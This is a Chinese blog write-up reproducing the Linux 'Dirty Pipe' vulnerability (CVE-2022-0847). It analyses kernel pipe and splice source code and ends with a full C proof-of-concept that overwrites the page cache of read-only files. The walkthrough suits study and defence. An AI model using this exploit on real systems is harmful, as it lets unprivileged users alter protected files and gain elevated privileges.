CVE-2022-0847漏洞复现 page cache 首先取自linux官方文档对于page cache的解释
物理内存是易失性的,将数据导入内存的常见情况是从文件中读取数据。每当读取文件时,数据都会放入page cache中,以避免在后续读取时进行昂贵的磁盘访问。同样,当写入文件时,数据被放置在page cache中,并最终进入后备存储设备。写入的页面被标记为脏页面,当 Linux 决定将它们重用于其他目的时,它会确保将设备上的文件内容与更新的数据同步。
pipe系列 在我们申请到一个pipe管道后,他们在内存当中大致呈以下局面
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 struct file +----------------+ | | +--------->| | | +----------------+ | | *private_data +-----------------------------------+ | | | | | +----------------+ | | +----+ *f_op | | | | | | | | | +----------------+ | Userland | | | *f_inode +--+ | struct pipe_inode_info | | | | | | +-----------------+-----------------+ | | +----------------+ | struct inode | +------------+ | fd[0] | files[0] +-----+ | | | +-->+------------+ +------->| | +-------------+ | | read | | +----------------+ | | *i_op +----+ | +------------+ +--->| pipe_buffer | +-----------------+-----------------+ | | | | | | | | | +-------------+ | fd[1] | files[1] +-----+ | | +------------+ | | +------------+ | | pipe_buffer | | | write | | | struct file | | ...... | | | | | | +-------------+ +-----------------+-----------------+ | | +----------------+ | | | | | +------------+ | | ........... | +-----|--->| | | +------------+ | | | *bufs +------+ +-------------+ | | | | | i_pipe +----|----------+ +------------+ | pipe_buffer | | +----------------+ | | | | | | +-------------+ | | *private_data | | +------------+ | +------------+ | | | | | ...... | | +------------+ | +----------------+ | | | | +----+ *f_op | | +------------+ | | | | | | | +----------------+ | | +------------------------------------------------+ | | *f_inode | | | | const struct file_operations pipefifo_fops = { | | | +--+ | | .open = fifo_open, | | +----------------+ | | .llseek = no_llseek, | | | | | | .read_iter = pipe_read, | | +----------------+ +-----+------------+ .write_iter = pipe_write, | | | | .poll = pipe_poll, | | | | .unlocked_ioctl = pipe_ioctl, | | | | .release = pipe_release, | | | | .fasync = pipe_fasync, | | | | .splice_write = iter_file_splice_write, | +----------------------------------------+ | }; | +------------------------------------------------+
pipe_inode_info 位于 fs/pipe.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 58 struct pipe_inode_info {59 struct mutex mutex ;60 wait_queue_head_t rd_wait, wr_wait;61 unsigned int head; 62 unsigned int tail; 63 unsigned int max_usage; 64 unsigned int ring_size; 65 #ifdef CONFIG_WATCH_QUEUE 66 bool note_loss;67 #endif 68 unsigned int nr_accounted; 69 unsigned int readers; 70 unsigned int writers; 71 unsigned int files; 72 unsigned int r_counter;73 unsigned int w_counter; 74 unsigned int poll_usage;75 struct page *tmp_page ;76 struct fasync_struct *fasync_readers ;77 struct fasync_struct *fasync_writers ;78 struct pipe_buffer *bufs ; 79 struct user_struct *user ; 80 #ifdef CONFIG_WATCH_QUEUE 81 struct watch_queue *watch_queue ;82 #endif 83 };
pipefifo_fops 位于 fs/pipe.c
,这里是pipe管道文件对应的虚函数表
1 2 3 4 5 6 7 8 9 10 11 1218 const struct file_operations pipefifo_fops = {1219 .open = fifo_open,1220 .llseek = no_llseek,1221 .read_iter = pipe_read, 1222 .write_iter = pipe_write,1223 .poll = pipe_poll,1224 .unlocked_ioctl = pipe_ioctl,1225 .release = pipe_release,1226 .fasync = pipe_fasync,1227 .splice_write = iter_file_splice_write,1228 };
pipe_write 一步一步分析pipe_write
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 415 static ssize_t 416 pipe_write(struct kiocb *iocb, struct iov_iter *from) 417 { 418 struct file *filp = iocb->ki_filp;419 struct pipe_inode_info *pipe = filp->private_data;420 unsigned int head;421 ssize_t ret = 0 ;422 size_t total_len = iov_iter_count(from);423 ssize_t chars;424 bool was_empty = false ;425 bool wake_next_writer = false ; ......446 454 head = pipe->head;455 was_empty = pipe_empty(head, pipe->tail); 456 chars = total_len & (PAGE_SIZE-1 ); 457 if (chars && !was_empty) { 458 unsigned int mask = pipe->ring_size - 1 ; 459 struct pipe_buffer *buf = &pipe->bufs[(head - 1 ) & mask];460 int offset = buf->offset + buf->len; 461 462 if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&463 offset + chars <= PAGE_SIZE) {464 ret = pipe_buf_confirm(pipe, buf);465 if (ret)466 goto out;467 468 ret = copy_page_from_iter(buf->page, offset, chars, from);469 if (unlikely(ret < chars)) {470 ret = -EFAULT;471 goto out;472 }473 474 buf->len += ret; 475 if (!iov_iter_count(from))476 goto out;477 }478 }
简述一下上面的步骤:
检查整个pipe所指向buffer的空间,这里检查我们想要传入的总字节数 total_size
,然后计算 chars
,这里是总字节相对于pagesize取余数
这里来判断offset + chars会不会超过该head buffer所指向的页面界限,并且判断buf->flags是否带有 PIPE_BUF_FLAG_CAN_MERGE
参数,满足两个条件就进行下面buffer的复制
然后如果没有进行一个初始的边角料拷贝,或者说拷完了,下面的代码继续运行,是一个大的for循环
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 480 for (;;) {481 if (!pipe->readers) {482 send_sig(SIGPIPE, current, 0 );483 if (!ret)484 ret = -EPIPE;485 break ;486 }487 488 head = pipe->head; 489 if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 490 unsigned int mask = pipe->ring_size - 1 ;491 struct pipe_buffer *buf = &pipe->bufs[head & mask]; 492 struct page *page = pipe->tmp_page;493 int copied;494 495 if (!page) {496 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); 497 if (unlikely(!page)) {498 ret = ret ? : -ENOMEM;499 break ;500 }501 pipe->tmp_page = page;502 }503 504 509 spin_lock_irq(&pipe->rd_wait.lock);510 511 head = pipe->head;512 if (pipe_full(head, pipe->tail, pipe->max_usage)) {513 spin_unlock_irq(&pipe->rd_wait.lock);514 continue ;515 }516 517 pipe->head = head + 1 ;518 spin_unlock_irq(&pipe->rd_wait.lock);519 520 521 buf = &pipe->bufs[head & mask];522 buf->page = page;523 buf->ops = &anon_pipe_buf_ops; 524 buf->offset = 0 ;525 buf->len = 0 ;526 if (is_packetized(filp)) 527 buf->flags = PIPE_BUF_FLAG_PACKET;528 else 529 buf->flags = PIPE_BUF_FLAG_CAN_MERGE; 530 pipe->tmp_page = NULL ;531 532 copied = copy_page_from_iter(page, 0 , PAGE_SIZE, from);533 if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {534 if (!ret)535 ret = -EFAULT;536 break ;537 }538 ret += copied;539 buf->offset = 0 ;540 buf->len = copied;541 542 if (!iov_iter_count(from))543 break ;544 }545 546 if (!pipe_full(head, pipe->tail, pipe->max_usage))547 continue ;548 549 550 if (filp->f_flags & O_NONBLOCK) {551 if (!ret)552 ret = -EAGAIN;553 break ;554 }555 if (signal_pending(current)) {556 if (!ret)557 ret = -ERESTARTSYS;558 break ;559 }560 561 567 __pipe_unlock(pipe);568 if (was_empty)569 wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);570 kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);571 wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));572 __pipe_lock(pipe);573 was_empty = pipe_empty(pipe->head, pipe->tail);574 wake_next_writer = true ;575 } .......
这里的for循环是整个pipe_write部分的核心,他承担了剩下的大部分拷贝,会不断检查pipe->bufs的充盈程度,一旦有空闲则会申请新的page来拷贝我们用户区传入的数据,这里如果我们创建pipe的时候没有设置标识 O_DIRECT
,则会在每个新创建的pipe_buffer->flags
置为 PIPE_BUF_FLAG_CAN_MERGE
pipe_read pipe_read函数大部分就是从上述的环形buffer当中读出数据,然后修改pipe_buffer以及 pipe_inode_info
相对应的部分,值得注意的一点就是其中对于读出完毕的pipe_buffer的flags字段并没有修改,所以当我们pipe_write之后,buf->flags中始终会有该标识位 PIPE_BUF_FLAG_CAN_MERGE
splice系统调用 先看看手册中的描述
splice() moves data between two file descriptors without copying between kernel address space and user address space. It transfers up to len bytes of data from the file descriptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.
大致意思是该系统调用将使得两个文件描述符之间的数据复制并不是内核与用户空间
这种形式.她至多可以从 fd_in
文件描述符当中复制大小为 len
的数据至 fd_out
,值得注意的是这两个文件描述符中至少需要引用了管道
1 2 3 4 5 6 7 8 9 ssize_t splice (int fd_in, off_t *_Nullable off_in, int fd_out, off_t *_Nullable off_out, size_t len, unsigned int flags) ;
似乎是由九种传参组合
fd_in
off_in
fd_out
off_out
Right/Wrong
pipe
NULL
pipe
NULL
:white_check_mark:
pipe
NULL
file
NULL
:white_check_mark:
pipe
NULL
file
buffer
:white_check_mark:
file
NULL
pipe
NULL
:white_check_mark:
file
NULL
file
NULL
:x:
file
NULL
file
buffer
:x:
file
buffer
pipe
NULL
:white_check_mark:
file
buffer
file
NULL
:x:
file
buffer
file
buffer
:x:
由于有着至少一个pipe的规定,所以最终能正确执行的就只有五种情况
然后我们来看系统调用源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 1332 SYSCALL_DEFINE6(splice, int , fd_in, loff_t __user *, off_in,1333 int , fd_out, loff_t __user *, off_out,1334 size_t , len, unsigned int , flags)1335 {1336 struct fd in , out ;1337 long error;1338 1339 if (unlikely(!len))1340 return 0 ;1341 1342 if (unlikely(flags & ~SPLICE_F_ALL))1343 return -EINVAL;1344 1345 error = -EBADF;1346 in = fdget(fd_in); 1347 if (in.file) {1348 out = fdget(fd_out);1349 if (out.file) {1350 error = __do_splice(in.file, off_in, out.file, off_out,1351 len, flags);1352 fdput(out);1353 }1354 fdput(in);1355 }1356 return error;1357 }
基本没有什么好说的,直接看 __do_splice
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 1116 static long __do_splice(struct file *in, loff_t __user *off_in,1117 struct file *out, loff_t __user *off_out,1118 size_t len, unsigned int flags)1119 {1120 struct pipe_inode_info *ipipe ;1121 struct pipe_inode_info *opipe ;1122 loff_t offset, *__off_in = NULL , *__off_out = NULL ;1123 long ret;1124 1125 ipipe = get_pipe_info(in, true );1126 opipe = get_pipe_info(out, true );1127 1128 if (ipipe && off_in)1129 return -ESPIPE;1130 if (opipe && off_out)1131 return -ESPIPE;1132 1133 if (off_out) {1134 if (copy_from_user(&offset, off_out, sizeof (loff_t ))) 1135 return -EFAULT;1136 __off_out = &offset;1137 }1138 if (off_in) {1139 if (copy_from_user(&offset, off_in, sizeof (loff_t ))) 1140 return -EFAULT; 1141 __off_in = &offset;1142 }1143 1144 ret = do_splice(in, __off_in, out, __off_out, len, flags);1145 if (ret < 0 )1146 return ret;1147 1148 if (__off_out && copy_to_user(off_out, __off_out, sizeof (loff_t )))1149 return -EFAULT;1150 if (__off_in && copy_to_user(off_in, __off_in, sizeof (loff_t )))1151 return -EFAULT;1152 1153 return ret;1154 }
这里仅仅也只是判断了一下你传递的参数的正确性,然后如果某个off_*不为空,则需要将其拷贝到内核空间 :)
do_splice 然后调用 do_splice
函数,该函数比较长,因此我们分开讲解,这里首先分成几种情况,分别是:
in和out均为pipe
in为pipe,out为普通文件
in为普通文件,out为pipe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 1025 1028 long do_splice (struct file *in, loff_t *off_in, struct file *out, 1029 loff_t *off_out, size_t len, unsigned int flags) 1030 {1031 struct pipe_inode_info *ipipe ;1032 struct pipe_inode_info *opipe ;1033 loff_t offset;1034 long ret;1035 1036 if (unlikely(!(in->f_mode & FMODE_READ) ||1037 !(out->f_mode & FMODE_WRITE)))1038 return -EBADF;1039 1040 ipipe = get_pipe_info(in, true );1041 opipe = get_pipe_info(out, true );1042 1043 if (ipipe && opipe) {1044 if (off_in || off_out) 1045 return -ESPIPE;1046 1047 1048 if (ipipe == opipe)1049 return -EINVAL;1050 1051 if ((in->f_flags | out->f_flags) & O_NONBLOCK)1052 flags |= SPLICE_F_NONBLOCK;1053 1054 return splice_pipe_to_pipe(ipipe, opipe, len, flags);1055 } ......
:one: pipe_to_pipe 可以看到上面的do_splice函数碰到两个pipe,则会调用 splice_pipe_to_pipe
函数,该函数主要是复制了pipe_buffer,将inpipe的pipe_buffer内容复制给了outpipe的pipe_buffer,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 1434 1437 static int splice_pipe_to_pipe (struct pipe_inode_info *ipipe, 1438 struct pipe_inode_info *opipe,1439 size_t len, unsigned int flags) 1440 {1441 struct pipe_buffer *ibuf , *obuf ;1442 unsigned int i_head, o_head;1443 unsigned int i_tail, o_tail;1444 unsigned int i_mask, o_mask;1445 int ret = 0 ;1446 bool input_wakeup = false ; .......1511 ibuf = &ipipe->bufs[i_tail & i_mask];1512 obuf = &opipe->bufs[o_head & o_mask];1513 1514 if (len >= ibuf->len) {1515 1518 *obuf = *ibuf;1519 ibuf->ops = NULL ;1520 i_tail++;1521 ipipe->tail = i_tail;1522 input_wakeup = true ;1523 o_len = obuf->len;1524 o_head++;1525 opipe->head = o_head;1526 } else {1527 1531 if (!pipe_buf_get(ipipe, ibuf)) {1532 if (ret == 0 )1533 ret = -EFAULT;1534 break ;1535 }1536 *obuf = *ibuf; ......
这里我们返回到do_splice,说下一个if判断
注意这里是 do_splice
剩下的部分代码,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 1057 if (ipipe) {1058 if (off_in)1059 return -ESPIPE;1060 if (off_out) {1061 if (!(out->f_mode & FMODE_PWRITE))1062 return -EINVAL;1063 offset = *off_out;1064 } else {1065 offset = out->f_pos;1066 }1067 1068 if (unlikely(out->f_flags & O_APPEND))1069 return -EINVAL;1070 1071 ret = rw_verify_area(WRITE, out, &offset, len); 1072 if (unlikely(ret < 0 ))1073 return ret;1074 1075 if (in->f_flags & O_NONBLOCK)1076 flags |= SPLICE_F_NONBLOCK;1077 1078 file_start_write(out);1079 ret = do_splice_from(ipipe, out, &offset, len, flags);1080 file_end_write(out);1081 1082 if (!off_out)1083 out->f_pos = offset;1084 else 1085 *off_out = offset;1086 1087 return ret; 1088 }
:two: pipe_to_file
然后我们查看do_splice_from
函数,这是第二种情况的判断
1 2 3 4 5 6 7 762 static long do_splice_from (struct pipe_inode_info *pipe, struct file *out, 763 loff_t *ppos, size_t len, unsigned int flags) 764 { 765 if (unlikely(!out->f_op->splice_write))766 return warn_unsupported(out, "write" );767 return out->f_op->splice_write(pipe, out, ppos, len, flags);768 }
这里调用到splice_write函数,他在普通文件当中的初始化函数指针指向iter_file_splice_write
,大意是将ipipe的即将复制pipe_buffer中指向的page页指针赋值给一个bio_vec
数组,他的结构如下:
1 2 3 4 5 32 struct bio_vec { 33 struct page *bv_page ;34 unsigned int bv_len;35 unsigned int bv_offset;36 };
然后之后调用vfs_iter_write
写入文件buffer
:three: file_to_pipe 然后是最后一部分的do_splice
,也是咱们本次漏洞的重点
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 if (opipe) {1091 if (off_out)1092 return -ESPIPE;1093 if (off_in) {1094 if (!(in->f_mode & FMODE_PREAD))1095 return -EINVAL;1096 offset = *off_in;1097 } else {1098 offset = in->f_pos;1099 }1100 1101 if (out->f_flags & O_NONBLOCK)1102 flags |= SPLICE_F_NONBLOCK;1103 1104 ret = splice_file_to_pipe(in, opipe, &offset, len, flags);1105 if (!off_in)1106 in->f_pos = offset;1107 else 1108 *off_in = offset;1109 1110 return ret;1111 }1112 1113 return -EINVAL;1114 }
直接查看splice_file_to_pipe
调用链,这里有个小知识那就是我们要知道某个文件的ops,我们可以直接去查看<name>_file_operations
,其中<name>
为我们的文件系统名称,例如ext4
等等
1 2 3 4 5 splice_file_to_pipe do_splice_to in ->f_op -> splice_read <==> generic_file_splice_read call_read_iter in ->f_op -> read_iter <==> generic_file_read_iter
好我们链条就先到这里,先查看该函数,下面是内核开发者对该函数作出的解释
This is the “read_iter()” routine for all filesystems that can use the page cache directly.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 2772 generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)2773 {2774 size_t count = iov_iter_count(iter); 2775 ssize_t retval = 0 ;2776 2777 if (!count)2778 return 0 ; 2779 2780 if (iocb->ki_flags & IOCB_DIRECT) { 2781 struct file *file = iocb->ki_filp;2782 struct address_space *mapping = file->f_mapping;2783 struct inode *inode = mapping->host;2784 2785 if (iocb->ki_flags & IOCB_NOWAIT) {2786 if (filemap_range_needs_writeback(mapping, iocb->ki_pos,2787 iocb->ki_pos + count - 1 ))2788 return -EAGAIN;2789 } else {2790 retval = filemap_write_and_wait_range(mapping,2791 iocb->ki_pos,2792 iocb->ki_pos + count - 1 );2793 if (retval < 0 )2794 return retval;2795 }2796 2797 file_accessed(file);2798 2799 retval = mapping->a_ops->direct_IO(iocb, iter);2800 if (retval >= 0 ) {2801 iocb->ki_pos += retval;2802 count -= retval;2803 }2804 if (retval != -EIOCBQUEUED)2805 iov_iter_revert(iter, count - iov_iter_count(iter));2806 2807 2816 if (retval < 0 || !count || IS_DAX(inode))2817 return retval;2818 if (iocb->ki_pos >= i_size_read(inode))2819 return retval;2820 }2821 2822 return filemap_read(iocb, iter, retval);2823 }2824 EXPORT_SYMBOL(generic_file_read_iter);
其中涉及到两个中间变量 iocb
和iter
,他们两个是在generic_file_splice_read
当中进行初始化的,下面分别给出初始化步骤:
iter
iocb
然后我们看到最后调用filemap_read
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 2642 ssize_t filemap_read (struct kiocb *iocb, struct iov_iter *iter, 2643 ssize_t already_read) 2644 {2645 struct file *filp = iocb->ki_filp; 2646 struct file_ra_state *ra = &filp->f_ra;2647 struct address_space *mapping = filp->f_mapping; 2648 struct inode *inode = mapping->host; 2649 struct folio_batch fbatch ;2650 int i, error = 0 ;2651 bool writably_mapped;2652 loff_t isize, end_offset;2653 ...2661 2662 do {2663 cond_resched();2664 2665 2670 if ((iocb->ki_flags & IOCB_WAITQ) && already_read)2671 iocb->ki_flags |= IOCB_NOWAIT;2672 2673 if (unlikely(iocb->ki_pos >= i_size_read(inode)))2674 break ;2675 2676 error = filemap_get_pages(iocb, iter, &fbatch); ...2727 copied = copy_folio_to_iter(folio, offset, bytes, iter);2728 2729 already_read += copied;2730 iocb->ki_pos += copied;2731 ra->prev_pos = iocb->ki_pos;2732 ...2743 2744 file_accessed(filp);2745 2746 return already_read ? already_read : error;2747 }2748 EXPORT_SYMBOL_GPL(filemap_read);
在该函数当中,我们会将数据从page cache复制到管道,这里并没有真正的进行逐字节复制.在一个dowhile的大循环当中,主要通过调用copy_folio_to_iter
来复制chunks
这里给出folio发布的官方解释 ,这样看来folio似乎是一个用来给复合页机制带来的歧义提供的解决办法,但我看到后面似乎并不受欢迎,但是由于现在替代方案较少,所以暂时将就着用吧:)
可以得出一个结论,我们在这里可以大致将folio类比为page,这对我们接下来的理解并没有任何影响,而copy_folio_to_iter
实际上也仅仅是调用了copy_page_to_iter
我们来查看copy_page_to_iter
函数调用链,根据文件的类型会有以下的情况
1 2 3 copy_page_to_iter __copy_page_to_iter copy_page_to_iter_ pipe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 382 static size_t copy_page_to_iter_pipe (struct page *page, size_t offset, size_t bytes, 383 struct iov_iter *i) 384 {385 struct pipe_inode_info *pipe = i->pipe;386 struct pipe_buffer *buf ;387 unsigned int p_tail = pipe->tail;388 unsigned int p_mask = pipe->ring_size - 1 ;389 unsigned int i_head = i->head;390 size_t off;391 392 if (unlikely(bytes > i->count))393 bytes = i->count;394 395 if (unlikely(!bytes))396 return 0 ;397 398 if (!sanity(i))399 return 0 ;400 401 off = i->iov_offset;402 buf = &pipe->bufs[i_head & p_mask]; 403 if (off) {404 if (offset == off && buf->page == page) {405 406 buf->len += bytes;407 i->iov_offset += bytes;408 goto out;409 }410 i_head++;411 buf = &pipe->bufs[i_head & p_mask];412 }413 if (pipe_full(i_head, p_tail, pipe->max_usage))414 return 0 ;415 416 buf->ops = &page_cache_pipe_buf_ops;417 418 get_page(page);419 buf->page = page;420 buf->offset = offset;421 buf->len = bytes;422 423 pipe->head = i_head + 1 ;424 i->iov_offset = offset + bytes;425 i->head = i_head;426 out:427 i->count -= bytes;428 return bytes; 429 }
我们可以看到这里并没有发生实际上的数据拷贝,而仅仅是page页面指针的改写,当文章写到这里我发现5.17.9的linux内核此时已经将该漏洞进行修复,所以这里我手动将其恢复到漏洞版本
漏洞利用 我们现在知道了漏洞点,那就是在我们使用splice系统调用来进行零拷贝时,从file拷贝到pipe其中的一个buff中时并没有修改其中的标识位,也就是pipe_buffer->flag
位, 此时如果flag位存在PIPE_BUF_FLAG_CAN_MERGE
,那么我们下次在写入该buffer的时候将从该pipe_buffer
的offset+len开始写,但是此时注意,经过splice的零拷贝,我们的pipe_buffer
是指向的pagecache的,所以这里导致我们可以直接修改pagecache当中的页面,且根本不会去考虑是否为可写,
所以本次漏洞利用分为以下几个步骤:
分配pipe以及其中的buffer
首先向其中灌入大量无意义数据,再依次排空,由于读并不会修改我们的标识,所以这样使得我们每个pipe_buffer都会带有PIPE_BUF_FLAG_CAN_MERGE
标识
splice
系统调用,将不可写的文件数据内容”拷贝”到pipe当中
我们将对于pipe的写转化为了对于不可写文件所映射到的pagecache的写
下面是漏洞的poc以及演示
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <stdint.h> #define PAGE_SIZE 0x1000 void initial_pipe (int *my_pipe) ;void fill_pipe (int *my_pipe) ;void drain_pipe (int *my_pipe) ;void free_env (int *my_pipe) ;void debug () { printf ("[\033[5;33m!\033[0m]\033[32mDebugging Here\033[0m\n" ); getchar(); }int main (int argc, char ** argv) { int my_pipe[2 ] = {0 }; int fd_read = 0 ; char buf[0x10 ] = {'\x00' }; struct stat file_st ; uint64_t offset = 0 ; if (argc < 4 ){ printf ("[x]The poc's right use is: \n<our_poc> <vuln_file> <offset> <payload>\n" ); puts ("[?]len < 0 will read the hole file..." ); exit (1 ); } puts ("[+]Initial the pipe..." ); initial_pipe(my_pipe); puts ("[+]Fill the pipe..." ); fill_pipe(my_pipe); puts ("[+]drain the pipe..." ); drain_pipe(my_pipe); fd_read = open(argv[1 ], O_RDONLY); if (fd_read < 0 ){ perror("open vuln file failed!" ); exit (1 ); } if (fstat(fd_read, &file_st) < 0 ){ perror("stat file failed!" ); exit (1 ); } if (argv[2 ] > 0 ) offset = atoi(argv[2 ]); else offset = file_st.st_size; printf ("%d\n" , offset); if (splice(fd_read, (uint64_t *)&offset, my_pipe[1 ], NULL , 1 , 0 ) < 0 ){ perror("splice fd to pipe" ); exit (1 ); } puts ("[+]We successfully execute the splice..." ); if (write(my_pipe[1 ], argv[3 ], sizeof (argv[3 ])) < 0 ){ perror("write failed" ); exit (1 ); } free_env(my_pipe); close(fd_read); return 0 ; }void initial_pipe (int *my_pipe) { pipe(my_pipe); fcntl(my_pipe[1 ], F_SETPIPE_SZ, 1 *PAGE_SIZE); }void fill_pipe (int *my_pipe) { int pipe_size = fcntl(my_pipe[1 ], F_GETPIPE_SZ); int nr = 0 ; printf ("[*]pipe_size is %d\n" , pipe_size); char buffer[PAGE_SIZE] = {0 }; memset (buffer, 0x41 , sizeof (buffer)); for (;pipe_size > 0 ; pipe_size -= nr) nr = write(my_pipe[1 ], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size)); printf ("[*]Fill the pipe done...\n" ); }void drain_pipe (int *my_pipe) { int pipe_size = fcntl(my_pipe[1 ], F_GETPIPE_SZ); int nr = 0 ; printf ("[*]pipe_size is %d\n" , pipe_size); char buffer[PAGE_SIZE] = {0 }; for (;pipe_size > 0 ; pipe_size -= nr) nr = read(my_pipe[0 ], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size)); printf ("[*]Drain the pipe done...\n" ); }void free_env (int *pipe) { close(pipe[0 ]); close(pipe[1 ]); }
参考 洞主原文章
精彩复现
folio是甚么